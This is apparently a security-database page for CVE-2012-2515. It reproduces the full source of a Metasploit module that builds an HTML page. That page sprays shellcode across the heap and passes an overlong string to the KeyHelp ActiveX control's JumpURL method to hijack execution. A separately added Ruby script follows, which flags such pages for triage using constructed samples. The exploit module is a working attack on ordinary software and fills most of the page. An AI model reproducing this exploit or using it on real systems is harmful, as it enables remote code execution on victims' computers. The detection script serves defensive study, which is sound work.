
EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow

Published: 01 Oct 2009 02:13:16 | Reported by: MC <[email protected]> | Type: metasploit | Source: www.rapid7.com

Exploits a stack buffer overflow in KeyHelp.ocx 1.2.3120.0, the KeyWorks KeyHelp ActiveX control bundled with EMC's ApplicationXtender 5.4.

Related

| Reporter | Title | Published |
|---|---|---|
| Circl | CVE-2012-2515 | 29 May 2018 15:50 |
| Check Point Advisories | Multiple Vendors KeyHelp ActiveX Control Buffer Overflow (CVE-2012-2515) | 1 Feb 2010 00:00 |
| CVE | CVE-2012-2515 | 5 Jul 2012 01:00 |
| Cvelist | CVE-2012-2515 | 5 Jul 2012 01:00 |
| ICS | GE Intelligent Platforms Proficy HTML Help Vulnerabilities | 11 Feb 2012 07:00 |
| Tenable Nessus | KeyWorks KeyHelp ActiveX Control Multiple Vulnerabilities | 26 Sep 2012 00:00 |
| Kaspersky | KLA10300 ACE vulnerability in GE IP products | 4 Jul 2012 00:00 |
| NVD | CVE-2012-2515 | 5 Jul 2012 03:23 |
| Prion | Stack overflow | 5 Jul 2012 03:23 |
| RedhatCVE | CVE-2012-2515 | 22 May 2025 12:10 |

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control
        (KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's
        Documentation ApplicationXtender 5.4.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'References'     =>
        [
          [ 'CVE', '2012-2515' ],
          [ 'OSVDB', '58423'],
          [ 'BID', '36546' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'         => 1024,
          'BadChars'      => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
        ],
      'DisclosureDate' => '2009-09-29',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME',   [ false, 'The file name.',  'msf.html']),
        ])
  end

  def exploit
    # Encode the shellcode.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Create some nops.
    nops    = Rex::Text.to_unescape(make_nops(4))

    # Set the return.
    ret     = Rex::Text.uri_encode([target.ret].pack('L'))

    # Randomize the javascript variable names.
    vname  = rand_text_alpha(rand(100) + 1)
    var_i  = rand_text_alpha(rand(30)  + 2)
    rand1  = rand_text_alpha(rand(100) + 1)
    rand2  = rand_text_alpha(rand(100) + 1)
    rand3  = rand_text_alpha(rand(100) + 1)
    rand4  = rand_text_alpha(rand(100) + 1)
    rand5  = rand_text_alpha(rand(100) + 1)
    rand6  = rand_text_alpha(rand(100) + 1)
    rand7  = rand_text_alpha(rand(100) + 1)
    rand8  = rand_text_alpha(rand(100) + 1)

    html = %Q|
      <html>
      <head>
        <script>
          try {
            var #{vname} = new ActiveXObject('KeyHelp.KeyCtrl.1');
            var #{rand1} = unescape('#{shellcode}');
            var #{rand2} = unescape('#{nops}');
            var #{rand3} = 20;
            var #{rand4} = #{rand3} + #{rand1}.length;
            while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
            var #{rand5} = #{rand2}.substring(0,#{rand4});
            var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
            while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
            var #{rand7} = new Array();
            for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
            var #{rand8} = "";
            for (#{var_i} = 0; #{var_i} < 4024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
            #{vname}.JumpURL(1, #{rand8}, "#{vname}");
          } catch( e ) { window.location = 'about:blank' ; }
        </script>
      </head>
      </html>
      |

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(html)
  end
end
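
For triage of HTML samples, the following added example (not part of the Metasploit module or of this page's source) statically flags pages that bind the `KeyHelp.KeyCtrl.1` ProgID to a variable and pass a script-built or overlong string to `JumpURL`, following the variable from its binding so randomized names do not matter. The helper names, the `MAX_URL` threshold and the two sample pages are assumptions constructed for illustration.

```ruby
# Added example: static triage of HTML for risky use of the KeyHelp control.
PROGID  = 'KeyHelp.KeyCtrl.1' # ProgID used by the module above
MAX_URL = 2048                # assumed upper bound for a plausible URL literal
IDENT   = /[A-Za-z_$][\w$]*/  # JavaScript identifier (ASCII subset)

# Split a call's argument text on top-level commas, keeping quoted commas.
def split_args(text)
  text.scan(/(?:"[^"]*"|'[^']*'|[^,])+/).map(&:strip)
end

# True if the variable is grown by self-concatenation (x += ... / x = x + ...).
def self_grown?(html, name)
  n = Regexp.escape(name)
  html.match?(/(?<![\w$])#{n}\s*(?:\+=|=\s*#{n}\s*\+)/)
end

# Returns { verdict:, objects:, calls: } for one HTML document. Variable names
# are followed from the ActiveXObject binding, so randomized names still match.
# <object classid=...> embedding is not covered: the page gives no CLSID.
# The argument capture stops at the first ')', enough for variables and plain literals.
def scan_keyhelp(html)
  bind = /(#{IDENT})\s*=\s*new\s+ActiveXObject\(\s*['"]#{Regexp.escape(PROGID)}['"]\s*\)/i
  objects = html.scan(bind).flatten.uniq
  calls = objects.flat_map do |obj|
    html.scan(/(?<![\w$])#{Regexp.escape(obj)}\.JumpURL\(([^)]*)\)/i).flatten.map do |raw|
      url = split_args(raw)[1].to_s # second argument is the URL string
      lit = url.match(/\A(['"])(.*)\1\z/m)
      reason = if lit then (lit[2].length > MAX_URL ? :overlong_literal : nil)
               elsif url.match?(/\A#{IDENT}\z/) && self_grown?(html, url) then :loop_built_string
               end
      { object: obj, reason: reason }
    end
  end
  verdict = if calls.any? { |c| c[:reason] } then :suspicious
            elsif objects.any? then :uses_control
            else :clean end
  { verdict: verdict, objects: objects, calls: calls }
end

# Constructed samples (not captured traffic); the loop bound is deliberately tiny.
SAMPLE_LOOP = %q{<script>var qZx = new ActiveXObject('KeyHelp.KeyCtrl.1');
var b = ""; for (i = 0; i < 8; i++) { b = b + unescape('%41') }
qZx.JumpURL(1, b, "qZx");</script>}
SAMPLE_PLAIN = %q{<script>var h = new ActiveXObject("keyhelp.keyctrl.1");
h.JumpURL(1, "topic.htm", "main");</script>}

puts [SAMPLE_LOOP, SAMPLE_PLAIN].map { |s| scan_keyhelp(s)[:verdict] }.inspect if __FILE__ == $PROGRAM_NAME
```

A `:uses_control` result only means the page scripts the control with an unremarkable argument; it is still worth reviewing on hosts where KeyHelp.ocx 1.2.3120.0 is installed.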
